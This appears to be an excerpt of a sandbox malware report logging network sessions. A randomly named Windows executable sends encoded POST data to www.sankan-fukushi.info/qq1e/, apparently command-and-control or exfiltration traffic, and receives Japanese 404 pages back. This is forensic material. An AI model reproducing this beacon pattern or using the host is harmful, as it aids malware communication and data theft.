                                                                                      Nov 25, 2024 13:57:08.291985989 CET1236INData Raw: 39 63 31 2e 34 37 34 2d 2e 31 32 36 20 32 2e 38 35 36 2e 37 33 31 20 33 2e 34 20 32 2e 31 30 37 2e 35 37 20 32 2e 30 32 35 2e 37 32 32 20 34 2e 31 34 35 2e 34 34 36 20 36 2e 32 33 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22
                                                                                      Data Ascii: 9c1.474-.126 2.856.731 3.4 2.107.57 2.025.722 4.145.446 6.231z"/><path fill="#fff" d="M39.765 24.186c-7.462 5.259-11.816 13.887-11.613 23.014 0 16.42 10.954 30.357 24.063 30.4h.15c13.079 0 24.183-13.8 24.242-30.191.013-4.387-.836-8.734-2.5-12.
                                                                                      Nov 25, 2024 13:57:08.291996956 CET1236INData Raw: 33 35 31 2d 31 2e 34 31 36 20 32 2e 32 38 35 2d 31 2e 31 30 33 6c 33 2e 35 20 31 2e 32 37 39 20 33 2e 35 31 37 2d 31 2e 32 37 39 63 2e 36 31 33 2d 2e 32 35 31 20 31 2e 33 31 34 2d 2e 31 34 32 20 31 2e 38 32 32 2e 32 38 32 2e 35 31 2e 34 32 35 2e
                                                                                      Data Ascii: 351-1.416 2.285-1.103l3.5 1.279 3.517-1.279c.613-.251 1.314-.142 1.822.282.51.425.746 1.095.616 1.746s-.607 1.178-1.241 1.374l-4.115 1.5c-.195.075-.403.116-.612.119z"/><path fill="#FFEBE9" d="M52.29 58.908l-2.319-2.92s2.394-4.259 2.394-7.254"/
                                                                                      Nov 25, 2024 13:57:08.292005062 CET1236INData Raw: 35 2d 32 2e 35 31 31 20 33 2e 39 31 37 20 32 2e 36 30 38 20 31 30 2e 34 32 38 20 36 2e 39 38 34 63 2e 31 32 39 2e 30 38 36 2e 32 38 31 2e 31 33 33 2e 34 33 37 2e 31 33 33 6c 2e 32 34 38 2d 2e 30 33 34 63 2e 32 32 36 2d 2e 30 37 34 2e 34 30 37 2d
                                                                                      Data Ascii: 5-2.511 3.917 2.608 10.428 6.984c.129.086.281.133.437.133l.248-.034c.226-.074.407-.245.493-.466l1.763-4.509 1.922.5c-.696 5.034-1.933 9.979-3.688 14.748-.952 2.538-2.094 5.001-3.417 7.367l-.4.681-.73 1.178c-.361.6-.739 1.153-1.093 1.657l-.208.
                                                                                      Nov 25, 2024 13:57:08.445940971 CET1236INData Raw: 37 38 63 2e 31 35 32 2e 31 35 37 2e 32 33 35 2e 33 36 37 2e 32 33 32 2e 35 38 35 76 38 2e 30 38 33 68 31 38 2e 30 31 39 76 2d 32 36 2e 30 37 38 63 2d 2e 30 30 36 2d 2e 33 32 35 2e 31 38 36 2d 2e 36 32 32 2e 34 38 35 2d 2e 37 35 2e 30 39 36 2d 2e
                                                                                      Data Ascii: 78c.152.157.235.367.232.585v8.083h18.019v-26.078c-.006-.325.186-.622.485-.75.096-.036.198-.052.3-.047h.022c.212-.001.415.084.563.235.153.156.237.367.233.585l-.015 26.054h17.521c-1.467-26.488-3.4-40.971-5.818-43.09-4.113-3.107-14.953-6.546-21.0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      18192.168.2.849735163.44.185.183806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:09.479331970 CET799OUTPOST /qq1e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.sankan-fukushi.info
                                                                                      Origin: http://www.sankan-fukushi.info
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.sankan-fukushi.info/qq1e/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 4f 59 61 68 4b 78 76 4b 59 7a 70 66 67 35 46 69 6b 46 75 56 59 75 6e 47 51 2f 70 32 65 66 47 61 70 76 4a 72 50 6a 50 53 59 69 2b 63 6f 4a 75 58 70 41 37 64 71 46 65 47 6d 30 78 56 67 30 4f 63 4f 57 6e 36 41 70 39 61 2f 56 75 58 52 74 69 70 58 49 2b 63 30 63 4e 30 65 56 68 39 66 64 46 50 77 48 32 74 65 79 59 67 70 4d 4b 36 35 4b 65 4f 72 35 4d 48 6b 4a 76 6a 6a 4d 32 79 36 32 43 33 65 47 76 79 6d 51 52 36 5a 66 62 66 53 34 64 54 63 57 41 69 74 39 75 30 69 47 32 57 38 58 58 74 38 63 2f 49 78 5a 43 53 70 4b 49 67 6d 50 4a 6c 4c 59 6e 45 2b 6e 56 77 75 57 44 45 4c 2b 31 34 6a 75 6f 6d 42 79 4e 59 6c 7a 57 51 52 32 4d 38 55 69 35 38 71 67 6c 43 41 52 78 49
                                                                                      Data Ascii: UbRxm=OYahKxvKYzpfg5FikFuVYunGQ/p2efGapvJrPjPSYi+coJuXpA7dqFeGm0xVg0OcOWn6Ap9a/VuXRtipXI+c0cN0eVh9fdFPwH2teyYgpMK65KeOr5MHkJvjjM2y62C3eGvymQR6ZfbfS4dTcWAit9u0iG2W8XXt8c/IxZCSpKIgmPJlLYnE+nVwuWDEL+14juomByNYlzWQR2M8Ui58qglCARxI
                                                                                      Nov 25, 2024 13:57:10.949321985 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:57:10 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 19268
                                                                                      Connection: close
                                                                                      Server: Apache
                                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                      Nov 25, 2024 13:57:10.949383974 CET1236INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                      Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
                                                                                      Nov 25, 2024 13:57:10.949397087 CET1236INData Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61
                                                                                      Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
                                                                                      Nov 25, 2024 13:57:10.949409962 CET1236INData Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b
                                                                                      Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
                                                                                      Nov 25, 2024 13:57:10.949642897 CET1236INData Raw: 67 65 5f 5f 63 61 70 74 69 6f 6e 22 3e e3 81 8a e6 8e a2 e3 81 97 e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                                                      Data Ascii: ge__caption"></p> <div class="lol-error-page__information"> <div class="lol-error-page__information-img"> <svg xmlns="http://www.w3.org/2000/svg" width=
                                                                                      Nov 25, 2024 13:57:10.949707985 CET1079INData Raw: 2e 31 36 31 20 30 2d 31 2e 39 20 30 2d 33 2e 38 35 33 2d 2e 35 38 34 2d 34 2e 34 32 35 2d 2e 34 34 37 2d 2e 32 38 2d 2e 39 37 38 2d 2e 33 39 32 2d 31 2e 35 2d 2e 33 31 36 6c 2e 30 30 32 2d 2e 30 30 32 7a 6d 35 37 2e 33 2e 32 34 31 63 2d 2e 34 38
                                                                                      Data Ascii: .161 0-1.9 0-3.853-.584-4.425-.447-.28-.978-.392-1.5-.316l.002-.002zm57.3.241c-.488-.051-.979.066-1.392.331-.6.557-.614 2.528-.629 4.425 0 .993 0 2.062-.09 3.161-.037 1.055-.147 2.106-.329 3.146-.239 1.881-.479 3.823 0 4.515.514.396 1.153.594
                                                                                      Nov 25, 2024 13:57:10.949719906 CET1236INData Raw: 30 34 2d 2e 30 30 31 20 32 2e 36 35 38 2e 35 38 31 20 35 2e 32 38 33 20 31 2e 37 30 36 20 37 2e 36 39 31 20 31 2e 32 34 37 20 32 2e 32 39 36 20 33 2e 37 30 36 20 33 2e 36 36 38 20 36 2e 33 31 35 20 33 2e 35 32 32 68 2e 36 34 33 63 2e 39 37 39 2d
                                                                                      Data Ascii: 04-.001 2.658.581 5.283 1.706 7.691 1.247 2.296 3.706 3.668 6.315 3.522h.643c.979-.032 1.941-.261 2.829-.673 4.489 11.438 14.1 19.566 24.976 19.566h.209c10.834 0 20.486-8.037 25.051-19.415.881.422 1.837.662 2.813.707h.733c2.576.142 5.006-1.201
                                                                                      Nov 25, 2024 13:57:10.949845076 CET224INData Raw: 39 63 31 2e 34 37 34 2d 2e 31 32 36 20 32 2e 38 35 36 2e 37 33 31 20 33 2e 34 20 32 2e 31 30 37 2e 35 37 20 32 2e 30 32 35 2e 37 32 32 20 34 2e 31 34 35 2e 34 34 36 20 36 2e 32 33 31 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22
                                                                                      Data Ascii: 9c1.474-.126 2.856.731 3.4 2.107.57 2.025.722 4.145.446 6.231z"/><path fill="#fff" d="M39.765 24.186c-7.462 5.259-11.816 13.887-11.613 23.014 0 16.42 10.954 30.357 24.063 30.4h.15c13.079 0 24.183-13.8 24.242-30.191.013-4.387
                                                                                      Nov 25, 2024 13:57:10.949856997 CET1236INData Raw: 2d 2e 38 33 36 2d 38 2e 37 33 34 2d 32 2e 35 2d 31 32 2e 37 39 33 2d 31 32 2e 32 32 35 2e 34 30 37 2d 32 36 2e 39 33 35 2d 32 2e 36 39 34 2d 33 34 2e 33 34 32 2d 31 30 2e 34 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64
                                                                                      Data Ascii: -.836-8.734-2.5-12.793-12.225.407-26.935-2.694-34.342-10.43z"/><path fill="#f60" d="M39.256 44.625c-1.8 0-3.2 1.776-3.217 4.064-.017 2.288 1.392 4.079 3.172 4.094 1.78.015 3.2-1.776 3.217-4.064.017-2.288-1.376-4.079-3.172-4.094zm26.2.12c-1.8 0
                                                                                      Nov 25, 2024 13:57:10.949876070 CET1236INData Raw: 34 2e 32 35 39 20 32 2e 33 39 34 2d 37 2e 32 35 34 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 35 32 2e 33 36 35 20 36 30 2e 37 31 34 63 2d 2e 35 34 38 2e 30 30 31 2d 31 2e 30 36 36 2d 2e 32 34 38 2d 31 2e 34 30 37
                                                                                      Data Ascii: 4.259 2.394-7.254"/><path fill="#f60" d="M52.365 60.714c-.548.001-1.066-.248-1.407-.677l-2.319-2.92c-.455-.579-.514-1.377-.15-2.017 1.141-1.931 1.865-4.079 2.125-6.306-.016-.481.16-.949.489-1.3.494-.533 1.264-.71 1.94-.445.677.265 1.122.918 1.
                                                                                      Nov 25, 2024 13:57:11.069622040 CET1236INData Raw: 2d 31 2e 30 39 33 20 31 2e 36 35 37 6c 2d 2e 32 30 38 2e 33 63 2d 2e 33 37 39 2e 35 32 33 2d 2e 37 33 31 20 31 2d 31 2e 30 38 34 20 31 2e 34 34 38 6c 2d 2e 34 34 37 2e 35 34 32 63 2d 2e 33 33 35 2e 34 31 31 2d 2e 36 37 34 2e 37 38 34 2d 31 20 31
                                                                                      Data Ascii: -1.093 1.657l-.208.3c-.379.523-.731 1-1.084 1.448l-.447.542c-.335.411-.674.784-1 1.142-.74.789-1.536 1.524-2.381 2.2l-.273.218-9.572-.005zm5-10.2c-.405-.001-.801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.023.126.056.25.1.371.312.743 1.041 1.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      19192.168.2.849736163.44.185.183806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:12.146219015 CET1816OUTPOST /qq1e/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.sankan-fukushi.info
                                                                                      Origin: http://www.sankan-fukushi.info
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.sankan-fukushi.info/qq1e/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 4f 59 61 68 4b 78 76 4b 59 7a 70 66 67 35 46 69 6b 46 75 56 59 75 6e 47 51 2f 70 32 65 66 47 61 70 76 4a 72 50 6a 50 53 59 69 47 63 6f 36 57 58 6f 6a 6a 64 34 56 65 47 76 55 78 51 67 30 50 4f 4f 57 2b 53 41 70 42 67 2f 58 57 58 51 50 36 70 44 70 2b 63 36 63 4e 30 63 56 68 34 53 39 46 57 77 48 47 68 65 7a 30 67 70 4d 4b 36 35 4e 6d 4f 76 72 30 48 6f 70 76 6b 72 73 32 45 2b 32 43 62 65 47 6d 50 6d 52 6c 45 5a 76 37 66 54 59 4e 54 50 51 30 69 6d 39 75 4d 6a 47 33 4c 38 58 62 75 38 63 4c 45 78 5a 65 73 70 4b 77 67 6c 2b 38 68 53 4a 54 44 69 46 46 6a 31 31 58 47 47 39 5a 45 69 4d 6b 50 44 77 74 4a 72 57 2f 2b 45 31 73 77 61 53 77 4a 32 30 64 58 49 41 77 57 74 6c 74 4c 73 34 75 64 4c 59 63 37 45 54 68 37 41 52 61 30 76 54 42 35 31 37 5a 69 70 71 50 47 54 74 47 42 57 79 75 38 6c 30 58 51 2f 56 4f 58 51 79 63 62 42 4a 4d 45 74 62 30 42 39 4c 6d 55 51 69 58 53 71 6c 51 67 38 71 33 50 49 64 66 34 78 59 39 61 39 56 70 35 56 47 4b 39 54 33 4b 45 56 75 4d 74 4e 4b 77 52 54 63 41 58 39 47 6d 53 [TRUNCATED]
                                                                                      Data Ascii: UbRxm=OYahKxvKYzpfg5FikFuVYunGQ/p2efGapvJrPjPSYiGco6WXojjd4VeGvUxQg0POOW+SApBg/XWXQP6pDp+c6cN0cVh4S9FWwHGhez0gpMK65NmOvr0Hopvkrs2E+2CbeGmPmRlEZv7fTYNTPQ0im9uMjG3L8Xbu8cLExZespKwgl+8hSJTDiFFj11XGG9ZEiMkPDwtJrW/+E1swaSwJ20dXIAwWtltLs4udLYc7ETh7ARa0vTB517ZipqPGTtGBWyu8l0XQ/VOXQycbBJMEtb0B9LmUQiXSqlQg8q3PIdf4xY9a9Vp5VGK9T3KEVuMtNKwRTcAX9GmSiYeR+tWV7PR8XWHG5CAk/R1eqtoPVFrPoUxd2xPNPyIqld3v6j9HWh8+DY59Zm9dmI5YpgAn6zhW+bcudk9q06Y3tSBd7mHzx5lgiHstjALod0fmvCSGuUdjOmEmCWBtl/VGWlEJ7dmTd/a1DCZhqpgX0KRi/Oaf1QLBtSdf8jame27itllBB1zkAL/4NUpeuR4wd30wFJc6W3DFOwJDa6NXvpRtdX+PTz9PqyWzsaSVPLJnnVuWIq96fY/wLljZg3rLyDePzVFeiYnXl19bp8QiDOASMnTtvIxRpM22H0bPoXXgPY4zC7peeaTJ6UILTq8KWkqLmpxP5hB48S5WTTao6L7bGRBrQYwRJ5xW4ptsDuGljBuhXj39WP7W7t0MefvjEPTa7uL35d0uMeXSq+1JNPbFbueR3CiAuW/mTG6jYZm0s2+li/cPiHxJd9bedaDgO87jh9AHsRGdPF8H7dzdNCBeszHhdrJbwCJ27PA0rAJt/Z971ae1ArTKCzxENdw/ZnpIg/1g9gD2vQX0H8aeFIXxe8G0yQZ78dAbkb08na6aytLgB/nBFwZTT1LQd4/eR9tuLkt1hmABxr3yyWXpeiV8Cc9uXDeGUzE+EXN4jZnOOPhd8DiJco9Gg90sKby6gPLSHVRO7r69pyqXV3E92gGZxyoLOd [TRUNCATED]
                                                                                      Nov 25, 2024 13:57:13.611373901 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:57:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 19268
                                                                                      Connection: close
                                                                                      Server: Apache
                                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                      Nov 25, 2024 13:57:13.611427069 CET1236INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                                                      Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
                                                                                      Nov 25, 2024 13:57:13.611469030 CET1236INData Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61
                                                                                      Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
                                                                                      Nov 25, 2024 13:57:13.611481905 CET655INData Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b
                                                                                      Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
                                                                                      Nov 25, 2024 13:57:13.611573935 CET1236INData Raw: 61 6c 2d 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30
                                                                                      Data Ascii: al-right { margin-left: 0; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal-right { margin-left: 20px; } } </style> <script type="text/javascript"> /
                                                                                      Nov 25, 2024 13:57:13.611584902 CET1236INData Raw: 2e 31 2d 32 2e 38 34 35 20 33 33 2e 30 35 36 2d 38 2e 39 34 20 34 2e 39 35 36 2d 36 2e 30 39 35 20 33 2e 33 34 33 2d 31 34 2e 34 36 33 20 31 2e 37 31 36 2d 32 32 2e 34 35 35 7a 6d 2d 36 32 2e 32 37 31 2d 33 38 2e 33 33 34 63 35 2e 31 39 33 2d 36
                                                                                      Data Ascii: .1-2.845 33.056-8.94 4.956-6.095 3.343-14.463 1.716-22.455zm-62.271-38.334c5.193-6.923 14.381-10.43 27.3-10.43h.314c12.974 0 22.058 3.582 26.936 10.535 2.787 4.183 4.285 9.091 4.31 14.117-4.045-13.545-15.289-21.356-31.774-21.431-11.253 0-19.93
                                                                                      Nov 25, 2024 13:57:13.611597061 CET1236INData Raw: 32 35 37 2e 34 36 32 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 34 32 2e 38 33 32 20 38 39 2e 36 32 36 6c 39 2e 31 37 33 20 38 2e 38 20 39 2e 34 38 38 2d 38 2e 37 32 36 2d 32 2e 36 33 34 2d 32 31 2e 34 37 36 68
                                                                                      Data Ascii: 257.462z"/><path fill="#fff" d="M42.832 89.626l9.173 8.8 9.488-8.726-2.634-21.476h-13.393z"/><path fill="#f60" d="M88.16 43.646c-1.061-2.641-3.633-4.362-6.48-4.335-.793-.06-1.59.001-2.364.181-.533-2.534-1.341-5.002-2.409-7.36-.304-.67-.986-1.0
                                                                                      Nov 25, 2024 13:57:13.611609936 CET1236INData Raw: 34 31 38 20 31 30 2e 35 33 35 2e 39 34 37 20 32 2e 33 36 33 20 31 2e 36 31 35 20 34 2e 38 32 38 20 31 2e 39 39 20 37 2e 33 34 35 2d 2e 36 31 20 31 2e 37 38 34 2d 2e 38 35 34 20 33 2e 36 37 33 2d 2e 37 31 38 20 35 2e 35 35 34 20 30 20 2e 39 33 33
                                                                                      Data Ascii: 418 10.535.947 2.363 1.615 4.828 1.99 7.345-.61 1.784-.854 3.673-.718 5.554 0 .933 0 1.926-.075 3.01-.075 1.084-.195 2.017-.3 2.935-.282 1.589-.348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.011 2.098-.449 4.172-
                                                                                      Nov 25, 2024 13:57:13.611732960 CET1236INData Raw: 34 7a 6d 33 32 2e 30 35 34 2e 31 33 37 63 2d 2e 34 38 37 2d 2e 30 30 33 2d 2e 39 35 32 2d 2e 32 30 34 2d 31 2e 32 38 37 2d 2e 35 35 37 2d 31 2e 30 39 2d 2e 38 37 34 2d 32 2e 35 36 38 2d 31 2e 30 38 37 2d 33 2e 38 36 31 2d 2e 35 35 37 2d 2e 39 31
                                                                                      Data Ascii: 4zm32.054.137c-.487-.003-.952-.204-1.287-.557-1.09-.874-2.568-1.087-3.861-.557-.919.364-1.959-.078-2.336-.992-.377-.914.051-1.96.959-2.349 2.653-1.123 5.719-.581 7.826 1.385.468.523.59 1.27.314 1.915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/
                                                                                      Nov 25, 2024 13:57:13.611743927 CET1236INData Raw: 2e 39 37 34 20 31 2e 33 32 37 2d 31 2e 38 20 31 2e 32 39 34 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 63 33 22 20 64 3d 22 4d 34 36 2e 39 31 35 20 31 33 38 2e 38 6c 2d 2e 32 37 38 2d 2e 32 33 31 63 2d 2e 38 2d 2e 36 36 37 2d 31 2e 35
                                                                                      Data Ascii: .974 1.327-1.8 1.294z"/><path fill="#fc3" d="M46.915 138.8l-.278-.231c-.8-.667-1.554-1.388-2.255-2.158-.362-.41-.728-.841-1.1-1.286l-.372-.448-.111-.147c-.343-.459-.7-.934-1.037-1.433l-.158-.238c-.372-.537-.74-1.108-1.123-1.724l-.442-.736-.214
                                                                                      Nov 25, 2024 13:57:13.736048937 CET1236INData Raw: 30 30 31 2d 31 2e 34 32 32 2e 34 31 35 2d 31 2e 37 36 33 20 31 2e 30 37 34 2d 2e 34 33 33 2e 38 32 35 2d 2e 32 34 34 20 31 2e 38 33 39 2e 34 35 36 20 32 2e 34 35 33 2e 36 39 32 2e 36 30 38 20 31 2e 37 31 32 2e 36 35 39 20 32 2e 34 36 31 2e 31 32
